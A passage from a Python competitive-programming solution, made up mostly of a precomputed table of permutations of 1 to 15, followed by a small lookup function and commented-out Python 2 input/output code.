3,6,14,7),(9,2,10,1,8,15,6,13,3,11,4,12,5,14,7),(9,2,10,1,8,15,6,13,4,11,3,12,5,14,7),(9,2,10,1,8,15,6,13,5,12,3,11,4,14,7),(9,2,10,1,8,15,6,13,5,12,4,11,3,14,7),(9,2,10,1,8,15,7,14,3,11,4,12,5,13,6),(9,2,10,1,8,15,7,14,4,11,3,12,5,13,6),(9,2,10,1,8,15,7,14,5,12,3,11,4,13,6),(9,2,10,1,8,15,7,14,5,12,4,11,3,13,6),(9,2,10,1,8,15,7,14,6,13,3,11,4,12,5),(9,2,10,1,8,15,7,14,6,13,4,11,3,12,5),(9,2,10,1,8,15,7,14,6,13,5,12,3,11,4),(9,2,10,1,8,15,7,14,6,13,5,12,4,11,3),(9,2,10,3,11,1,8,15,4,12,5,13,6,14,7),(9,2,10,3,11,1,8,15,5,12,4,13,6,14,7),(9,2,10,3,11,1,8,15,6,13,4,12,5,14,7),(9,2,10,3,11,1,8,15,6,13,5,12,4,14,7),(9,2,10,3,11,1,8,15,7,14,4,12,5,13,6),(9,2,10,3,11,1,8,15,7,14,5,12,4,13,6),(9,2,10,3,11,1,8,15,7,14,6,13,4,12,5),(9,2,10,3,11,1,8,15,7,14,6,13,5,12,4),(9,2,10,3,11,4,12,1,8,15,5,13,6,14,7),(9,2,10,3,11,4,12,1,8,15,6,13,5,14,7),(9,2,10,3,11,4,12,1,8,15,7,14,5,13,6),(9,2,10,3,11,4,12,1,8,15,7,14,6,13,5),(9,2,10,3,11,4,12,5,13,1,8,15,6,14,7),(9,2,10,3,11,4,12,5,13,1,8,15,7,14,6),(9,2,10,3,11,4,12,5,13,6,14,1,8,15,7),(9,2,10,3,11,4,12,5,13,6,14,7,15,1,8),(9,2,10,3,11,4,12,5,13,6,14,7,15,8,1),(9,2,10,3,11,4,12,5,13,6,15,7,14,1,8),(9,2,10,3,11,4,12,5,13,6,15,8,1,14,7),(9,2,10,3,11,4,12,5,14,6,13,1,8,15,7),(9,2,10,3,11,4,12,5,14,7,15,6,13,1,8),(9,2,10,3,11,4,12,5,14,7,15,8,1,13,6),(9,2,10,3,11,4,12,5,15,7,14,6,13,1,8),(9,2,10,3,11,4,12,5,15,8,1,13,6,14,7),(9,2,10,3,11,4,13,5,12,1,8,15,6,14,7),(9,2,10,3,11,4,13,5,12,1,8,15,7,14,6),(9,2,10,3,11,4,13,6,14,5,12,1,8,15,7),(9,2,10,3,11,4,13,6,14,7,15,5,12,1,8),(9,2,10,3,11,4,13,6,14,7,15,8,1,12,5),(9,2,10,3,11,4,13,6,15,7,14,5,12,1,8),(9,2,10,3,11,4,13,6,15,8,1,12,5,14,7),(9,2,10,3,11,4,14,6,13,5,12,1,8,15,7),(9,2,10,3,11,4,14,7,15,6,13,5,12,1,8),(9,2,10,3,11,4,14,7,15,8,1,12,5,13,6),(9,2,10,3,11,4,15,7,14,6,13,5,12,1,8),(9,2,10,3,11,4,15,8,1,12,5,13,6,14,7),(9,2,10,3,12,4,11,1,8,15,5,13,6,14,7),(9,2,10,3,12,4,11,1,8,15,6,13,5,14,7),(9,2,10,3,12,4,11,1,8,15,7,14,5,13,6),(9,2,10,3,12,4,11,1,8,15,7,14,6,13,5),(9,2,10,3,12,5,13,4,11,1,8,15,6,14,7),(9,2,10,3,12,5,13,4,11,1,8,15,7,14,6),(9,2,10,3,12,5,13,6,14,4,11,1,8,15,7),(9,2,10,3,12,5,13,6,14,7,15,4,11,1,8),(9,2,10,3,12,5,13,6,14,7,15,8,1,11,4),(9,2,10,3,12,5,13,6,15,7,14,4,11,1,8),(9,2,10,3,12,5,13,6,15,8,1,11,4,14,7),(9,2,10,3,12,5,14,6,13,4,11,1,8,15,7),(9,2,10,3,12,5,14,7,15,6,13,4,11,1,8),(9,2,10,3,12,5,14,7,15,8,1,11,4,13,6),(9,2,10,3,12,5,15,7,14,6,13,4,11,1,8),(9,2,10,3,12,5,15,8,1,11,4,13,6,14,7),(9,2,10,3,13,5,12,4,11,1,8,15,6,14,7),(9,2,10,3,13,5,12,4,11,1,8,15,7,14,6),(9,2,10,3,13,6,14,5,12,4,11,1,8,15,7),(9,2,10,3,13,6,14,7,15,5,12,4,11,1,8),(9,2,10,3,13,6,14,7,15,8,1,11,4,12,5),(9,2,10,3,13,6,15,7,14,5,12,4,11,1,8),(9,2,10,3,13,6,15,8,1,11,4,12,5,14,7),(9,2,10,3,14,6,13,5,12,4,11,1,8,15,7),(9,2,10,3,14,7,15,6,13,5,12,4,11,1,8),(9,2,10,3,14,7,15,8,1,11,4,12,5,13,6),(9,2,10,3,15,7,14,6,13,5,12,4,11,1,8),(9,2,10,3,15,8,1,11,4,12,5,13,6,14,7),(9,2,11,3,10,1,8,15,4,12,5,13,6,14,7),(9,2,11,3,10,1,8,15,5,12,4,13,6,14,7),(9,2,11,3,10,1,8,15,6,13,4,12,5,14,7),(9,2,11,3,10,1,8,15,6,13,5,12,4,14,7),(9,2,11,3,10,1,8,15,7,14,4,12,5,13,6),(9,2,11,3,10,1,8,15,7,14,5,12,4,13,6),(9,2,11,3,10,1,8,15,7,14,6,13,4,12,5),(9,2,11,3,10,1,8,15,7,14,6,13,5,12,4),(9,2,11,4,12,3,10,1,8,15,5,13,6,14,7),(9,2,11,4,12,3,10,1,8,15,6,13,5,14,7),(9,2,11,4,12,3,10,1,8,15,7,14,5,13,6),(9,2,11,4,12,3,10,1,8,15,7,14,6,13,5),(9,2,11,4,12,5,13,3,10,1,8,15,6,14,7),(9,2,11,4,12,5,13,3,10,1,8,15,7,14,6),(9,2,11,4,12,5,13,6,14,3,10,1,8,15,7),(9,2,11,4,12,5,13,6,14,7,15,3,10,1,8),(9,2,11,4,12,5,13,6,14,7,15,8,1,10,3),(9,2,11,4,12,5,13,6,15,7,14,3,10,1,8),(9,2,11,4,12,5,13,6,15,8,1,10,3,14,7),(9,2,11,4,12,5,14,6,13,3,10,1,8,15,7),(9,2,11,4,12,5,14,7,15,6,13,3,10,1,8),(9,2,11,4,12,5,14,7,15,8,1,10,3,13,6),(9,2,11,4,12,5,15,7,14,6,13,3,10,1,8),(9,2,11,4,12,5,15,8,1,10,3,13,6,14,7),(9,2,11,4,13,5,12,3,10,1,8,15,6,14,7),(9,2,11,4,13,5,12,3,10,1,8,15,7,14,6),(9,2,11,4,13,6,14,5,12,3,10,1,8,15,7),(9,2,11,4,13,6,14,7,15,5,12,3,10,1,8),(9,2,11,4,13,6,14,7,15,8,1,10,3,12,5),(9,2,11,4,13,6,15,7,14,5,12,3,10,1,8),(9,2,11,4,13,6,15,8,1,10,3,12,5,14,7),(9,2,11,4,14,6,13,5,12,3,10,1,8,15,7),(9,2,11,4,14,7,15,6,13,5,12,3,10,1,8),(9,2,11,4,14,7,15,8,1,10,3,12,5,13,6),(9,2,11,4,15,7,14,6,13,5,12,3,10,1,8),(9,2,11,4,15,8,1,10,3,12,5,13,6,14,7),(9,2,12,4,11,3,10,1,8,15,5,13,6,14,7),(9,2,12,4,11,3,10,1,8,15,6,13,5,14,7),(9,2,12,4,11,3,10,1,8,15,7,14,5,13,6),(9,2,12,4,11,3,10,1,8,15,7,14,6,13,5),(9,2,12,5,13,4,11,3,10,1,8,15,6,14,7),(9,2,12,5,13,4,11,3,10,1,8,15,7,14,6),(9,2,12,5,13,6,14,4,11,3,10,1,8,15,7),(9,2,12,5,13,6,14,7,15,4,11,3,10,1,8),(9,2,12,5,13,6,14,7,15,8,1,10,3,11,4),(9,2,12,5,13,6,15,7,14,4,11,3,10,1,8),(9,2,12,5,13,6,15,8,1,10,3,11,4,14,7),(9,2,12,5,14,6,13,4,11,3,10,1,8,15,7),(9,2,12,5,14,7,15,6,13,4,11,3,10,1,8),(9,2,12,5,14,7,15,8,1,10,3,11,4,13,6),(9,2,12,5,15,7,14,6,13,4,11,3,10,1,8),(9,2,12,5,15,8,1,10,3,11,4,13,6,14,7),(9,2,13,5,12,4,11,3,10,1,8,15,6,14,7),(9,2,13,5,12,4,11,3,10,1,8,15,7,14,6),(9,2,13,6,14,5,12,4,11,3,10,1,8,15,7),(9,2,13,6,14,7,15,5,12,4,11,3,10,1,8),(9,2,13,6,14,7,15,8,1,10,3,11,4,12,5),(9,2,13,6,15,7,14,5,12,4,11,3,10,1,8),(9,2,13,6,15,8,1,10,3,11,4,12,5,14,7),(9,2,14,6,13,5,12,4,11,3,10,1,8,15,7),(9,2,14,7,15,6,13,5,12,4,11,3,10,1,8),(9,2,14,7,15,8,1,10,3,11,4,12,5,13,6),(9,2,15,7,14,6,13,5,12,4,11,3,10,1,8),(9,2,15,8,1,10,3,11,4,12,5,13,6,14,7),(10,2,9,1,8,15,3,11,4,12,5,13,6,14,7),(10,2,9,1,8,15,4,11,3,12,5,13,6,14,7),(10,2,9,1,8,15,5,12,3,11,4,13,6,14,7),(10,2,9,1,8,15,5,12,4,11,3,13,6,14,7),(10,2,9,1,8,15,6,13,3,11,4,12,5,14,7),(10,2,9,1,8,15,6,13,4,11,3,12,5,14,7),(10,2,9,1,8,15,6,13,5,12,3,11,4,14,7),(10,2,9,1,8,15,6,13,5,12,4,11,3,14,7),(10,2,9,1,8,15,7,14,3,11,4,12,5,13,6),(10,2,9,1,8,15,7,14,4,11,3,12,5,13,6),(10,2,9,1,8,15,7,14,5,12,3,11,4,13,6),(10,2,9,1,8,15,7,14,5,12,4,11,3,13,6),(10,2,9,1,8,15,7,14,6,13,3,11,4,12,5),(10,2,9,1,8,15,7,14,6,13,4,11,3,12,5),(10,2,9,1,8,15,7,14,6,13,5,12,3,11,4),(10,2,9,1,8,15,7,14,6,13,5,12,4,11,3),(10,3,11,2,9,1,8,15,4,12,5,13,6,14,7),(10,3,11,2,9,1,8,15,5,12,4,13,6,14,7),(10,3,11,2,9,1,8,15,6,13,4,12,5,14,7),(10,3,11,2,9,1,8,15,6,13,5,12,4,14,7),(10,3,11,2,9,1,8,15,7,14,4,12,5,13,6),(10,3,11,2,9,1,8,15,7,14,5,12,4,13,6),(10,3,11,2,9,1,8,15,7,14,6,13,4,12,5),(10,3,11,2,9,1,8,15,7,14,6,13,5,12,4),(10,3,11,4,12,2,9,1,8,15,5,13,6,14,7),(10,3,11,4,12,2,9,1,8,15,6,13,5,14,7),(10,3,11,4,12,2,9,1,8,15,7,14,5,13,6),(10,3,11,4,12,2,9,1,8,15,7,14,6,13,5),(10,3,11,4,12,5,13,2,9,1,8,15,6,14,7),(10,3,11,4,12,5,13,2,9,1,8,15,7,14,6),(10,3,11,4,12,5,13,6,14,2,9,1,8,15,7),(10,3,11,4,12,5,13,6,14,7,15,2,9,1,8),(10,3,11,4,12,5,13,6,14,7,15,8,1,9,2),(10,3,11,4,12,5,13,6,15,7,14,2,9,1,8),(10,3,11,4,12,5,13,6,15,8,1,9,2,14,7),(10,3,11,4,12,5,14,6,13,2,9,1,8,15,7),(10,3,11,4,12,5,14,7,15,6,13,2,9,1,8),(10,3,11,4,12,5,14,7,15,8,1,9,2,13,6),(10,3,11,4,12,5,15,7,14,6,13,2,9,1,8),(10,3,11,4,12,5,15,8,1,9,2,13,6,14,7),(10,3,11,4,13,5,12,2,9,1,8,15,6,14,7),(10,3,11,4,13,5,12,2,9,1,8,15,7,14,6),(10,3,11,4,13,6,14,5,12,2,9,1,8,15,7),(10,3,11,4,13,6,14,7,15,5,12,2,9,1,8),(10,3,11,4,13,6,14,7,15,8,1,9,2,12,5),(10,3,11,4,13,6,15,7,14,5,12,2,9,1,8),(10,3,11,4,13,6,15,8,1,9,2,12,5,14,7),(10,3,11,4,14,6,13,5,12,2,9,1,8,15,7),(10,3,11,4,14,7,15,6,13,5,12,2,9,1,8),(10,3,11,4,14,7,15,8,1,9,2,12,5,13,6),(10,3,11,4,15,7,14,6,13,5,12,2,9,1,8),(10,3,11,4,15,8,1,9,2,12,5,13,6,14,7),(10,3,12,4,11,2,9,1,8,15,5,13,6,14,7),(10,3,12,4,11,2,9,1,8,15,6,13,5,14,7),(10,3,12,4,11,2,9,1,8,15,7,14,5,13,6),(10,3,12,4,11,2,9,1,8,15,7,14,6,13,5),(10,3,12,5,13,4,11,2,9,1,8,15,6,14,7),(10,3,12,5,13,4,11,2,9,1,8,15,7,14,6),(10,3,12,5,13,6,14,4,11,2,9,1,8,15,7),(10,3,12,5,13,6,14,7,15,4,11,2,9,1,8),(10,3,12,5,13,6,14,7,15,8,1,9,2,11,4),(10,3,12,5,13,6,15,7,14,4,11,2,9,1,8),(10,3,12,5,13,6,15,8,1,9,2,11,4,14,7),(10,3,12,5,14,6,13,4,11,2,9,1,8,15,7),(10,3,12,5,14,7,15,6,13,4,11,2,9,1,8),(10,3,12,5,14,7,15,8,1,9,2,11,4,13,6),(10,3,12,5,15,7,14,6,13,4,11,2,9,1,8),(10,3,12,5,15,8,1,9,2,11,4,13,6,14,7),(10,3,13,5,12,4,11,2,9,1,8,15,6,14,7),(10,3,13,5,12,4,11,2,9,1,8,15,7,14,6),(10,3,13,6,14,5,12,4,11,2,9,1,8,15,7),(10,3,13,6,14,7,15,5,12,4,11,2,9,1,8),(10,3,13,6,14,7,15,8,1,9,2,11,4,12,5),(10,3,13,6,15,7,14,5,12,4,11,2,9,1,8),(10,3,13,6,15,8,1,9,2,11,4,12,5,14,7),(10,3,14,6,13,5,12,4,11,2,9,1,8,15,7),(10,3,14,7,15,6,13,5,12,4,11,2,9,1,8),(10,3,14,7,15,8,1,9,2,11,4,12,5,13,6),(10,3,15,7,14,6,13,5,12,4,11,2,9,1,8),(10,3,15,8,1,9,2,11,4,12,5,13,6,14,7),(11,3,10,2,9,1,8,15,4,12,5,13,6,14,7),(11,3,10,2,9,1,8,15,5,12,4,13,6,14,7),(11,3,10,2,9,1,8,15,6,13,4,12,5,14,7),(11,3,10,2,9,1,8,15,6,13,5,12,4,14,7),(11,3,10,2,9,1,8,15,7,14,4,12,5,13,6),(11,3,10,2,9,1,8,15,7,14,5,12,4,13,6),(11,3,10,2,9,1,8,15,7,14,6,13,4,12,5),(11,3,10,2,9,1,8,15,7,14,6,13,5,12,4),(11,4,12,3,10,2,9,1,8,15,5,13,6,14,7),(11,4,12,3,10,2,9,1,8,15,6,13,5,14,7),(11,4,12,3,10,2,9,1,8,15,7,14,5,13,6),(11,4,12,3,10,2,9,1,8,15,7,14,6,13,5),(11,4,12,5,13,3,10,2,9,1,8,15,6,14,7),(11,4,12,5,13,3,10,2,9,1,8,15,7,14,6),(11,4,12,5,13,6,14,3,10,2,9,1,8,15,7),(11,4,12,5,13,6,14,7,15,3,10,2,9,1,8),(11,4,12,5,13,6,14,7,15,8,1,9,2,10,3),(11,4,12,5,13,6,15,7,14,3,10,2,9,1,8),(11,4,12,5,13,6,15,8,1,9,2,10,3,14,7),(11,4,12,5,14,6,13,3,10,2,9,1,8,15,7),(11,4,12,5,14,7,15,6,13,3,10,2,9,1,8),(11,4,12,5,14,7,15,8,1,9,2,10,3,13,6),(11,4,12,5,15,7,14,6,13,3,10,2,9,1,8),(11,4,12,5,15,8,1,9,2,10,3,13,6,14,7),(11,4,13,5,12,3,10,2,9,1,8,15,6,14,7),(11,4,13,5,12,3,10,2,9,1,8,15,7,14,6),(11,4,13,6,14,5,12,3,10,2,9,1,8,15,7),(11,4,13,6,14,7,15,5,12,3,10,2,9,1,8),(11,4,13,6,14,7,15,8,1,9,2,10,3,12,5),(11,4,13,6,15,7,14,5,12,3,10,2,9,1,8),(11,4,13,6,15,8,1,9,2,10,3,12,5,14,7),(11,4,14,6,13,5,12,3,10,2,9,1,8,15,7),(11,4,14,7,15,6,13,5,12,3,10,2,9,1,8),(11,4,14,7,15,8,1,9,2,10,3,12,5,13,6),(11,4,15,7,14,6,13,5,12,3,10,2,9,1,8),(11,4,15,8,1,9,2,10,3,12,5,13,6,14,7),(12,4,11,3,10,2,9,1,8,15,5,13,6,14,7),(12,4,11,3,10,2,9,1,8,15,6,13,5,14,7),(12,4,11,3,10,2,9,1,8,15,7,14,5,13,6),(12,4,11,3,10,2,9,1,8,15,7,14,6,13,5),(12,5,13,4,11,3,10,2,9,1,8,15,6,14,7),(12,5,13,4,11,3,10,2,9,1,8,15,7,14,6),(12,5,13,6,14,4,11,3,10,2,9,1,8,15,7),(12,5,13,6,14,7,15,4,11,3,10,2,9,1,8),(12,5,13,6,14,7,15,8,1,9,2,10,3,11,4),(12,5,13,6,15,7,14,4,11,3,10,2,9,1,8),(12,5,13,6,15,8,1,9,2,10,3,11,4,14,7),(12,5,14,6,13,4,11,3,10,2,9,1,8,15,7),(12,5,14,7,15,6,13,4,11,3,10,2,9,1,8),(12,5,14,7,15,8,1,9,2,10,3,11,4,13,6),(12,5,15,7,14,6,13,4,11,3,10,2,9,1,8),(12,5,15,8,1,9,2,10,3,11,4,13,6,14,7),(13,5,12,4,11,3,10,2,9,1,8,15,6,14,7),(13,5,12,4,11,3,10,2,9,1,8,15,7,14,6),(13,6,14,5,12,4,11,3,10,2,9,1,8,15,7),(13,6,14,7,15,5,12,4,11,3,10,2,9,1,8),(13,6,14,7,15,8,1,9,2,10,3,11,4,12,5),(13,6,15,7,14,5,12,4,11,3,10,2,9,1,8),(13,6,15,8,1,9,2,10,3,11,4,12,5,14,7),(14,6,13,5,12,4,11,3,10,2,9,1,8,15,7),(14,7,15,6,13,5,12,4,11,3,10,2,9,1,8),(14,7,15,8,1,9,2,10,3,11,4,12,5,13,6),(15,7,14,6,13,5,12,4,11,3,10,2,9,1,8),(15,8,1,9,2,10,3,11,4,12,5,13,6,14,7)]
}
if n not in d:
return -1
if k > len(d[n]):
return -1
return d[n][k - 1]
def getArray(n, k):
if n % 2:
return getArraysFastOdd(n, k)
return getArraysFastEven(n, k)
# for _ in xrange(input()):
# n, k = map(int, raw_input().split())
# val = getArray(n, k)
# if val in [-1, 1]:
# print val
# else:
# print " ".join(str(i) for i in val) | [
"[email protected]"
] |
Subsets and Splits
No saved queries yet
Save your SQL queries to embed, download, and access them later. Queries will appear here once saved.